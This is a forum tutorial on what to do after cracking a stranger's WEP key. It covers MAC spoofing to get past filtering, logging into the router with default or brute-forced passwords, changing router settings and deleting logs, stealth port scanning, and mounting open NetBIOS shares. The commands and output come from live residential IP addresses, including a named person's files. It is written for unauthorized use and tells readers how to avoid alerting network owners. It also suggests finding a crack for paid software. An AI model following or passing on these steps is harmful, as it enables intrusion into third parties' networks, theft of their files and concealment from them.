TheTAZZone - Internet Chaos

Tutorial – Cracking WEP with Windows XP part 2

ORIGINALLY POSTED BY NOKIA FOR THETAZZONE/TAZFORUM HERE

Do not use, republish, in whole or in part, without the consent of the Author. TheTAZZone policy is that Authors retain the rights to the work they submit and/or post…we do not sell, publish, transmit, or have the right to give permission for such…TheTAZZone merely retains the right to use, retain, and publish submitted work within it’s Network

[size=150][u][b]Cracking WEP with Windows XP SP2 – Part Two[/b][/u][/size]

[img]http://i226.photobucket.com/albums/dd306/Egaladeist/TAZBANNER7689abc.gif[/img]

Part Two in the Cracking WEP series covers what to do once you have a valid WEP key – I recommend you read Part One (if you have not already) before reading this tutorial if you want to understand how WEP works and how to get the WEP key. It can be found here: http://www.tazforum.thetazzone.com/viewtopic.php?t=2069

So, you have managed to get a valid WEP key, and are wondering what to do next?

Well, first of all, you should try to associate with the Wireless Access Point (WAP or AP). This is made very easy in Windows XP SP2:

[b][u]When SSID Broadcasting is enabled:[/b][/u]
Start > Connect to > Wireless Network Connection > View Available Wireless Networks

You will now be presented with a list of wireless networks that Windows XP has managed to find. If SSID broadcasting is enabled on the AP, the network name will show up, and the application will also let you know if the AP is using WPA encryption or not.

If it shows the network name and then ‘Security enabled wireless network’ beneath it, there is a 90% chance that it will be using WEP for its security. If it is using WPA, it will say “Security Enabled Network (WPA)”.

Now just double click on the network name and it will prompt you to enter the WEP key – enter this twice and see if it lets you connect.

If it does, well done, you have successfully associated with the AP – if it does not, the following are the most likely possible causes of this:

– The AP has MAC Address filtering enabled;
– You are too far away from the AP;
– The WEP key is wrong.

[b]The AP has MAC address filtering enabled[/b]
If you followed my previous paper to obtain the WEP key, I mentioned writing down the MAC addresses that had successfully associated with the AP in case MAC address filtering was active.

Now you know why!

Change your MAC address (covered later on) to one that you know was associated and therefore authenticated to that AP. Then, wait until it is not in use – the early hours of the morning are usually good for this – change your MAC Address, and try to associate with the AP. You can try it whilst the rightful owner of the MAC is online, but you will either kick him off or be rejected by the AP.

[b]You are to far away from the AP[/b]
– Move closer to it;
– Wait until night time – wireless waves travel further at night, especially if it has been raining (the more humid, the better);
– Get an external and more powerful antenna, or a directional antenna (these are much more powerful than omnidirectional antennae);
– Try another wireless card;
– Sometimes moving rooms in your house can solve the issue – I pick up APs in one room in the front of my house that I don’t in a room at the back of my house;
– Move into the garden – there are no walls or electrical interference in the garden!

[b]The WEP key is wrong[/b]
This may sound obvious but I have had students do this in the past… Make sure that the WEP key you have managed to obtain is for the same AP to which you are trying to connect!
Check you are entering it in correctly – it is in HEX so the 0 is a ZERO, [b]not[/b] a capital ‘O’ – there is no ‘O’ in HEX – I have seen this before too!

[b][u]If SSID broadcasting is disabled:[/b][/u]
If SSID broadcasting is disabled, and if you have not managed to find it with Airodump, you will have to fire Airodump back up and let it collect data again (use your IVS file and just add data to this) until it finds the SSID – it will find it, given enough data. There are other applications that will do this on various operating systems, but I am using Airodump here.

Once you have the ESSID (the name of the wireless network), you need to tell Windows what AP you would like it to connect to. You do this like so:

Start > Connect to > Wireless Network Connection > View Wireless Networks > Change Advanced settings (on the left) > Wireless Networks (Middle tab on top) > Add (under preferred networks) > Type the SSID exactly as Airodump has displayed it to you into the “SSID” box > Network Authentication is usually OPEN > Select WEP from the Data Encryption > Uncheck ‘The Key is provided for me automatically’ box if it is ticked > Then enter the WEP key into the relevant boxes, without the colons.

If you wish, you can go to the last tab (Connection) and check the box to ‘Automatically connect when network is in range’. This will automatically connect you to this network when Windows picks it up; this setting is usually enabled by default.

The other settings will differ by AP but are usually left unchecked.

[b][u]Changing your MAC address:[/b][/u]
For some people, this can seem a bit daunting and/or a complex task to do. This would have been true a few years ago, but nowadays there are hundreds of applications which can do this for you, and with Windows XP SP2 it can even be done using the inbuilt network configuration tools.

First, let me very briefly explain what a Media Access Control (MAC) address is and why it is so important on a network.

All Network Interface Cards (NICs) have an unique set of numbers and letters encoded into the hardware when they are made in the factory. Theoretically, every single NIC in the world has a different MAC address. It is encoded using the HEX numbering system – that is, the decimal digits (numbers from 0-9) and the letters A-F (the same HEX that a WEP key uses).

It will look something like this: 00:09:5B:84:A6:DF

Each manufacturer has a different OUI (Organisationally Unique Identifier) at the beginning of the MAC address, but that is not important to us here.

When you try to assiciate with an AP your MAC address is included with the header of the frame (data) that you are sending. The AP will check this against a local database to see if you are allowed to associate with the AP or not. If you are not obviously you will not be allowed to associate, so will need to spoof your own MAC address. Be awre that you will cause a duplicate entry in the AP’s ARP cache if you try to use the MAC address of a host that is already associated with the AP. It may be wise to wait until a quiet period – usually at night before doing this.

I don’t want to go into too much detail here about this process, but if you do want to learn more about it and how it can be exploited on a network, you can read other papers that I have written here:
http://tazforum.thetazzone.com/viewtopic.php?t=473
http://tazforum.thetazzone.com/viewtopic.php?t=530

To change a MAC address, I like to use AMAC: http://amac.paqtool.com/

You can download a trial version of it from the link above, and the more resourceful of you will be able to find a crack to unlock the full version of it.

The program is very user-friendly, and there is no need for me to explain how to use it. But, if you do have any issue with changing your MAC address with it, post in this thread and someone will try to help you (DO NOT post asking where to get the crack).

To change your MAC address using Windows’ inbuilt tools, you must use the Windows Device Manager (this is not possible on ALL wireless adaptors, especially in-built ones). Here are instructions on how to do this:

Control Panel > System > Hardware > Device manager > Network Adaptors > Select your network adaptor > Advanced > MAC Address / Hardware Address/Locally administered address > Change it to the desired value.

**Make sure you write the original one down so you can change it back**

Or you can do it via the registry:

1. Open up a command prompt and type “ipconfig /all”, write down the Description for the NIC you want to change and also the MAC address you want to change.

2. Open up a command prompt and type “net config rdr”

3. Write down the long number between the curly braces { }. This is the GUID of the NIC – you may have more than one; if so, write them all down or copy and paste them into a text file for reference later on.

4. Start -> Run, type “regedt32”. Do not use Regedit.

5. If you so wish you can back your registry up in case you inadvertently mess it up – the registry is vital to how Windows operates, and incorrectly changing a setting could render your computer unusable.
To back it up, either right click on the root of the key we are editing (in this case, it is HKEY_LOCAL_MACHINE) and select Export – call it something appropriate and save it somewhere (like My Documents). Or, if you want to back up the whole registry, right click on My Computer > Export – this will export the entire registry.

6. Go to “HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Class\ {4D36E972-E325-11CE-BFC1-08002BE10318}. Double click on the first one to expand the tree. The sub keys are 4-digit numbers, which represent a whole range of different hardware. You should see most of them start with 0000, then 0001, 0002, 0003 and so on.

7. Go through each sub-key that starts with 0000 and check the DriverDesc keyword on the right until you see the NIC you want to change the MAC address on. The DriveDesc will be the same as what your NIC was called in the Device Manager. If you are not sure about the DriverDesc, you can verify it by checking if the NetCfgInstanceID keyword value matches the GUID from step you wrote down earlier.
If there is no match, then move on to 0001, 0002, 0003, and so on, until you find the one you want. Usually 0000 contains the first NIC you installed on the computer.

8. When you have found and selected the correct sub-key (0000, in my case), check if there is a keyword “NetworkAddress” on the right side of the window.
If the “NetworkAddress” keyword does not exist, we will have to create it, like so:
Click on the drop down menu “Edit -> Add Value”.
In the Add Value window, enter the following value then click OK.
Value Name: = NetworkAddress
Data Type: = REG_SZ
Then the String Editor window will pop up:
Enter the new 12 digit MAC address that we know is allowed to authenticate to the AP > OK.

Close the registry.

To make this MAC address active you need to either disable and then re-enable the NIC or just reboot your system.

So now we have a MAC Address that we know is allowed to associate with the AP, try to re-authenticate.

You should now be able to connect – if not, carry on with the troubleshooting steps mentioned above!

If you’re still unable to authenticate, post in this thread with any error messages and a detailed description of what is going wrong and someone will try to help you out!

I will take it now that you have been able to associate with the AP and are connected OK.

There is no set way to do things from here on, and you can go off and search for a whole range of things you can do to a computer on the same network as you!

But, to get you started, I will give you a few [b]basic[/b] ideas and things you can try.

[b]Administratively connect to the AP[/b]
Open up a command prompt and type IPCONFIG:

Look under the relevant NIC to find your IP address and your Default Gateway:
[code]
Ethernet adapter Wireless Network Connection:

Connection-specific DNS Suffix . : bubbles
IP Address. . . . . . . . . . . . : 192.168.2.4
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.2.1
[/code]
The IP Address and Subnet mask tell us what subnet we are on – in the example above, I am on the 192.168.2.0 network and a 255.255.255.0 mask. From this, I can determine that the possible range of IP’s that could be active is 192.168.2.1 – 192.168.2.254.

We already know that 192.168.2.1 is active and what it is – the default gateway. In this case (and probably in yours too), it is also the IP address of the AP!

So we open up our web browser and type 192.168.2.1 into it, which will take us to the admin login page for the AP.
There’s a 9/10 chance that the make and model of the AP will be displayed for us here – when we have this, pop along to Google and search for ‘default wireless access point passwords’ which will give you thousands of sites which will list the default passwords for WAP’s (such as this one: http://www.phenoelit.de/dpl/dpl.html). Find the entry for the make and model of the AP and try the login details to see if they work.

If they do not, go and download [url=http://www.hoobie.net/brutus/]Brutus[/url] and try an HTTP brute force attack against it.

Once we have managed to connect to the AP as an adminstrator, we can see its whole configuration – look for any port forwarding entries to give you an idea of what services may be running behind the AP. You may also be able to see all the DHCP assignments (IP addresses that the AP has given out to hosts). You can also open ports on the AP, should you wish to. Check its logs. Some AP’s will not allow wireless clients to talk to each other, which will mess up any further testing attempts later on, so you should turn that setting off now. Enter your own, correct MAC address into the MAC address table so that you will be able to connect when other hosts are connected next time. Check the range of IP’s to be issued to hosts – if the owner only has two computers he may only have set two IP addresses to be issued, so extend this by one so that you can connect at the same time as the other two hosts.

I would not change the password once you know it, as this will let the owner know that he has been pwned and will just prompt him to hard reset the router and try harder to secure it. If you launch any attacks from the outside, you can also go in and delete the logs here.

[b]Port Scanning[/b]
We know the IP range in use by either the output of the ipconfig command or, if we managed to connect to the AP as an adminstrator, we could see the current IP setup, so we can scan the network to see what hosts are active.

I prefer NMAP for this, but any port scanner will do:

To perform a ping sweep with NMAP we use the –sP switch:
[code]H:\>nmap -sP 192.168.2.0/24[/code]
The 192.168.2.0/24 tells NMAP to ping all hosts between 192.168.2.0 – 255, the /24 is an abbreviated way of telling it the subnet mask – 255.255.255.0.

This may return something similar to this:
[code]
Starting Nmap 4.03 ( http://www.insecure.org/nmap ) at 2006-08-28 16:21 GMT Daylight Time
Host 192.168.2.1 appears to be up.
Host 192.168.2.2 appears to be up.
Host 192.168.2.5 appears to be up.
Nmap finished: 256 IP addresses (3 hosts up) scanned in 68.844 seconds
[/code]
We know what 192.168.2.1 is and now we also know what other hosts are active on the network.

As most of you probably know, you don’t connect to an actual ‘computer’ – you connect to a service that the computer is running. This could be a service that the OS is running, eg, NetBIOS or a Third Party Service eg, VNC.

To talk to other computers, most services use ports.

For the most part, a service will use a pre-defined port (by default).

So, if you scan a computer’s ports, you can find out what services are running.

Once you have a list of used ports and services, then research these services to see what they do – if you find one that interests you, research how to exploit this service, so that you can compromise the computer running it.

This is known as port scanning, and the main reason for doing it is to discover what services are running on each host.

**Be careful not to alert anyone on the network with overenthusiastic port scanning. If a host has a firewall active and a message pops up saying ‘Connection attempt from 192.168.2.x port 139’, the owner may be a bit suspicious if the IP is one that should not be in use. Try to use a passive scan such as the –sS switch in NMAP**

[b]NetBIOS[/b]
It is possible to connect to a NetBIOS share that the firewall on the AP may have been protecting – here is an extract from a NetBIOS paper I wrote a few months ago: (Note the IP Addresses will have changed since this was written, and will belong to someone else by now!)
[quote]
After you have downloaded Nmap go and get winfo from here:
http://ntsecurity.nu/toolbox/winfo/

When you have this browse to C:\WINDOWS\system32 and drop the winfo file there. Or you can manually edit your path for the command prompt to include the location of the winfo file.

Now we have nmap we want it to scan a range of IP’s but as we are trying to gain access to the NetBIOS shares, we only need to scan ports 139 and 445. So we issue the following command:
[code]
Nmap –sS –P0 81.32.12.0-255 –p139,445
[/code]

Here we have told nmap to conduct a SYN Stealth scan, without pinging the hosts, against the IP range of 81.32.12.0 – 81.32.12.255 only on ports 139 & 445.

Here are the results of the scan:
[code]
Interesting ports on 81.32.12.204:
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.205:
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 206.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.207:
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.208:
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 222.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 223.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.224:
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.225:
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 226.Red-81-32-12.dynamicIP.ri
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.227:
PORT STATE SERVICE
139/tcp closed netbios-ssn
445/tcp filtered microsoft-ds

Interesting ports on 81.32.12.248:
PORT STATE SERVICE
139/tcp filtered netbios-ssn
445/tcp filtered microsoft-ds

**OUTPUT TRUNCATED**

Nmap finished: 256 IP addresses (256 hosts up) …..
[/code]

OK, now looking at the output of the scan, there is three states a port can be in, Closed, Filtered or Open.

Closed speaks for itself, Filtered usually means it is open/active but is protected by a firewall of some kind and Open means it is open and un-protected.

So we trawl through the results and find that 81.32.12.240 has an open port on 139…

So we will go and take a look at it.

Just a side note – we scanned for port 445 to as it is possible to have port 139 open but not have the file sharing service running – if port 445 is open as well as 139 it usually means that the file sharing service is up and runnning and could save us some time when chosing which host to attack.

Fire up the command prompt again and use the in-built NBTSTAT utility that comes with Windows. The command we give is:
Nbtstat –a [ip address]

Like so:
[code]
H:\>nbtstat -a 81.32.12.240

Local Area Connection:
Node IpAddress: [192.168.2.3] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
———————————————
MASSAMA <00> UNIQUE Registered
MASSAMA <20> UNIQUE Registered
GRUPO_TRABAJO <00> GROUP Registered
GRUPO_TRABAJO <1E> GROUP Registered

MAC Address = 00-53-45-00-00-00
[/code]

So what is all this telling us?

Well what we are looking at mainly is the ‘TYPE’ status. We want to see <20> there. A common misconception is that if you can connect to a box in the above mentioned manner, that file sharing is enabled. This is not always the case. When we have connected we need to see the <20> there to tell us File Sharing is enabled, if it is not there and you are at a level that means you are reading this – you may as well move on to another box

The following table lists all the possible entries you can get:
[code]
00 U Workstation Service
01 U Messenger Service
<.._MSBROWSE_> 01 G Master Browser
03 U Messenger Service
06 U RAS Server Service
1F U NetDDE Service
20 U File Server Service
21 U RAS Client Service
22 U Exchange Interchange
23 U Exchange Store
24 U Exchange Directory
30 U Modem Sharing Server Service
31 U Modem Sharing Client Service
43 U SMS Client Remote Control
44 U SMS Admin Remote Control Tool
45 U SMS Client Remote Chat
46 U SMS Client Remote Transfer
4C U DEC Pathworks TCP/IP Service
52 U DEC Pathworks TCP/IP Service
87 U Exchange MTA
6A U Exchange IMC
BE U Network Monitor Agent
BF U Network Monitor Application
03 U Messenger Service
00 G Domain Name
1B U Domain Master Browser
1C G Domain Controllers
1D U Master Browser
1E G Browser Service Elections
1C G Internet Information Server
00 U Internet Information Server
[/code]

As you can see there are many different services that we can connect to. The scope of this paper is File Sharing though, so we will just concentrate on the <20> field.

So, after discovering we can ‘nbtstat’ to another box and we have established that the File Sharing Service is running we want to see what shares are available on a box.

For this we again use an inbuilt command in Windows. The ‘net’ command. Or more specifically the ‘net view’ command.

[code]
H:\>net view \\81.32.12.240
System error 5 has occurred.

Access is denied.
[/code]

Woops. Ok so this guy is not as open as he first appeared and we can’t get a list of his shares. This may be because he is not running any shares or because he has locked down his box and prevented if from displaying his shares to the casual internet user.

I have put this in to this paper for a few reasons. The first being, if you scour the internet looking for NetBIOS tutorials, you will find hundreds that have been wrote and performed and an internal LAN, which is conveniently setup to allow anonymous access to the File Sharing service. This paper is using live IP addresses in real life scenarios on the real internet – not a pre-constructed LAN. If you don’t agree with the using a real IP scenario – this paper is not for you and you should stop reading it now.

Another reason I left it in is to show that just because you can see the NetBIOS table and it has the <20> File Sharing service running, does not mean you can connect to it!

The final reason is to demonstrate that you will not always be successful with this attack and it can take a lot of trail and error. I have given lessons in the past that have gone on for in excess of 60 minutes before we have found an open and suitable host.

There are ways to gain access to secured shares but that is in the scope of the Advanced NetBIOS paper which will follow this one.

Right, so the last command would not let us get a list of the shares available…..but that does not mean there aren’t any. We can try to connect to the most obvious ones anyway and see what happens.

We stick with the inbuilt ‘net’ command only this time we use the ‘net use’ command.
[code]
H:\>net use \\81.32.12.240\ipc$
The password is invalid for \\81.32.12.240\ipc$.

Enter the user name for ‘81.32.12.240’: administrator
Enter the password for 81.32.12.240:
System error 1326 has occurred.

Logon failure: unknown user name or bad password.
[/code]

OK we don’t know the password…..there are heaps of password crackers for NetBIOS out there – which I consider to be more advanced so will be included in the next paper.

We do have the option of connecting via a ‘null’ session however. A null session does not require a user name or password and will usually allow a connection attempt.
To signify a null connection attempt we use the “” /U:”” switch at the end of our command.

Try the following:
[code]
H:\>net use \\81.32.12.240\ipc$ “” /U:””
The command completed successfully.
[/code]

Now try the ‘net view’ command again to see if we can get a list of the shares. This may or may not be successful but more often than not it will fail.(If you are successful read on further down the page to find what to do next!)

Right, so for the scope of our paper the above target will be considered ‘secure’ and we move on to easier pickings……..back to nmap!

I find it easier to either use the oN/ switch or to right click the top of the command prompt window and go to properties. Once here increase the buffer size to enable you to scroll upwards in the command prompt – otherwise you may not be able to view the entire output.

The best results for this type of crack are usually found in a residential subnet of IP addresses. How do you find one of those? If you’re at home chances are you are in a residential subnet! Take a look at your own IP and use that. When I ran this scan my IP was in the 86.132.223.x range so I scanned that.
[code]
nmap -sS -P0 -v 86.132.223.0-255 -p 139,445
[/code]

The results for open ports came back as:
[code]
Discovered open port 139/tcp on 86.132.223.96
Discovered open port 139/tcp on 86.132.223.124
Discovered open port 139/tcp on 86.132.223.178
Discovered open port 139/tcp on 86.132.223.227
[/code]

OK, so now we have a whole host of my neighbours to connect to!

Let choose an IP!

Hmmmmmm 86.132.223.178 I think!

So open up a command prompt and type:
[code]
H:\>nbtstat -a 86.132.223.178

Local Area Connection:
Node IpAddress: [0.0.0.0] Scope Id: []

Host not found.

Wireless Network Connection 3:
Node IpAddress: [192.168.2.6] Scope Id: []

NetBIOS Remote Machine Name Table

Name Type Status
———————————————
OFFICE <00> UNIQUE Registered
MSHOME <00> GROUP Registered
OFFICE <20> UNIQUE Registered
MSHOME <1E> GROUP Registered

MAC Address = 00-53-45-00-00-00
[/code]

Ok so we now have the NetBIOS table and the MAC address. We take a look to see if the File Sharing Service is active (<20>). Yep it is.

So, now as we know, we issue the net view command to get a list of the shares….

[code]
H:\>net view 86.132.223.178
Shared resources at 86.132.223.178

OFFICE

Share name Type Used as Comment

——————————————————————————-
bramford photos Disk
BrotherD Print Brother DCP-340CW USB Printer
BrotherD.2 Print BRN_759F2E
johns Disk
PaperPor Print PaperPort Black & White Image
PaperPor.2 Print PaperPort Color Image
Printer Print Imprimante Fax Olitec
Printer4 Print ProgeSOFT PDF Wizard
Printer7 Print Net-It Now! SE for Pressworks
Printer9 Print EPSON PictureMate
SharedDocs Disk
SLAVE (D) Disk
The command completed successfully.
[/code]

Look at all those shares.

Now open up a new command prompt and give the following command:
[code]
H:\>winfo 86.132.223.178 -v

Winfo 2.0 – copyright (c) 1999-2003, Arne Vidstrom
– http://www.ntsecurity.nu/toolbox/winfo/

SYSTEM INFORMATION:

– OS version: 5.1

DOMAIN INFORMATION:

– Primary domain (legacy): MSHOME
– Account domain: OFFICE
– Primary domain: MSHOME
– DNS name for primary domain:
– Forest DNS name for primary domain:

PASSWORD POLICY:

Warning: Unable to retrieve password policy.
Reason : Access denied.

LOCOUT POLICY:

Warning: Unable to retrieve lockout policy.
Reason : Access denied.

SESSIONS:

Warning: Unable to retrieve sessions.
Reason : Access denied.

LOGGED IN USERS:

* OFFICE$

* vernon cooper

USER ACCOUNTS:

Warning: Unable to enumerate users.
Reason : Access denied.

WORKSTATION TRUST ACCOUNTS:

Warning: Unable to enumerate workstation trust accounts.
Reason : Access denied.

INTERDOMAIN TRUST ACCOUNTS:

Warning: Unable to enumerate interdomain trust accounts.
Reason : Access denied.

SERVER TRUST ACCOUNTS:

Warning: Unable to enumerate server trust accounts.
Reason : Access denied.

SHARES:

* IPC$

– Type: Unknown
– Remark: Remote IPC

* print$

– Type: Disk drive
– Remark: Printer Drivers

* SharedDocs

– Type: Disk drive
– Remark:

* johns

– Type: Disk drive
– Remark:

* PaperPor.2

– Type: Print queue
– Remark: PaperPort Color Image

* Printer7

– Type: Print queue
– Remark: Net-It Now! SE for Pressworks

* SLAVE (D)

– Type: Disk drive
– Remark:

* Printer4

– Type: Print queue
– Remark: ProgeSOFT PDF Wizard

* PaperPor

– Type: Print queue
– Remark: PaperPort Black & White Image

* BrotherD.2

– Type: Print queue
– Remark: BRN_759F2E

* bramford photos

– Type: Disk drive
– Remark:

* Printer9

– Type: Print queue
– Remark: EPSON PictureMate

* Printer

– Type: Print queue
– Remark: Imprimante Fax Olitec

* BrotherD

– Type: Print queue
– Remark: Brother DCP-340CW USB Printer
[/code]

As you can see winfo gives us all the shares in an easier to read layout. You can put –n at the end of the winfo command to establish a null session if issuing the command without it does not work.

Ok let’s pick a share….mmmm…johns looks good.

Let me explain the following command briefly first though.

“Net use” – means we are going to use a network resource.
The “*”means use the next available drive letter. We normally have C for the hard drive, D for the next logical partition or next hard drive, E for a CD-ROM and maybe even F for another CD-ROM/DVD-ROM etc. Using the * just tells windows to use the next available letter, starting from Z and working backwards. We can specify our own letter if we want to but the outcome is the same.
[code]
H:\>net use * \\86.132.223.178\johns
Drive Z: is now connected to \\86.132.223.178\johns.

The command completed successfully.
[/code]

Ok, so John has a share on this computer that is open to the whole world and is not password protected.

How do we see what information is available to us?

Simply go to ‘My Computer’ and you will have a Z drive there already connected and mapped out for you! Click on it and you get to see what is in Johns share.

Let’s try another Share:
[code]
H:\>net use * \\86.132.223.178\SharedDocs
Drive Y: is now connected to \\86.132.223.178\SharedDocs.

The command completed successfully.
[/code]

So go back to My Computer and you will now see the Y: drive connected and mapped out for you.

The other and easier way to do this, is to now go to Start > Search > Computers and add the IP Address in. You will now get a nice graphical view of all the shares.[/quote]
There are many things that you can do now – some will work, most will not. It is all about research to see what your options are.

[b]To reiterate:[/b]
– Find the IP range in use;
– Find the default gateway, which will usually be the IP of the AP;
– Try to connect to the AP’s admin page by typing the IP into a web browser;
– Ping sweep the IP range to see what hosts are up;
– Port scan each individual host to see what services are running;
– Research the active services – what they are, how they work, etc;
– Research how to exploit a service that looks “interesting”;
– Do NOT make any changes that the AP’s owner will notice, such as changing the password, unnecessarily deleting the AP’s logs, etc.

The intent of this paper was to show you how to authenticate to an AP that has SSID broadcasting either enabled or disabled and how to connect to one that has MAC address filtering enabled, and also to give you a few basic tips and a push in the right direction to show you the kind of things you can do when you have managed to connect.
There are thousands of possible services that can be running on the hosts behind an AP – some with easy to exploit flaws, some with flaws that are harder to exploit and some with no flaws at all – but these services are the key to connecting to ANY computer; if there are no services running, you can’t connect to the host.

You need to read up on any services you find running and see if they can be exploited – I gave you a common example with the NetBIOS service to show you the type of things you are able to do when you have identified a service. Now you need to identify a service or two that interest you and read up on them.

Any questions about this can be posted in this thread. Alternatively, feel free to start a thread of your own (in the relevant forum) to ask your question.

Please DO NOT email or PM me to ask me any questions personally, as I will not reply to them.

Thanks

Nokia

//If you have a web site and would like to link to this or replicate it on your site then you may do so as long as you link back to here with the proper credit. Please do not do as some lame skiddie called Krozo done on what has to be the worst forum I have ever seen [url=http://team-hp.com/forum/index.php?showtopic=463&st=0&gopid=4038&#entry4038]here[/url] with Part One and not only try to pass it off as their own but also thank ME for helping THEM write it!

……………………………………………

[b][url=http://digg.com/search?s=Cracking+WEP+with+Windows+XP+SP2+-+Part+Two&submit=Search&section=news&type=both&area=all&age=365&sort=new]If you like this tutorial please help others find it by Digging it Here[/url][/b]

Leave a Reply

Your email address will not be published. Required fields are marked *

Advertise

If you'd like to advertise on The Mutt ( aka TheTAZZone.com ) feel free to contact us at: administration[at]thetazzone.com

TheTAZZone is a non-commercial entity. We do not sell any products or services ourselves. Our revenue comes from advertising and donations only.

We appreciate your support! Your advertising revenue ( or donations ) helps us to continue to upgrade, improve, and offset the costs of maintaining this site.

Donations can be made through the page ' Donate '.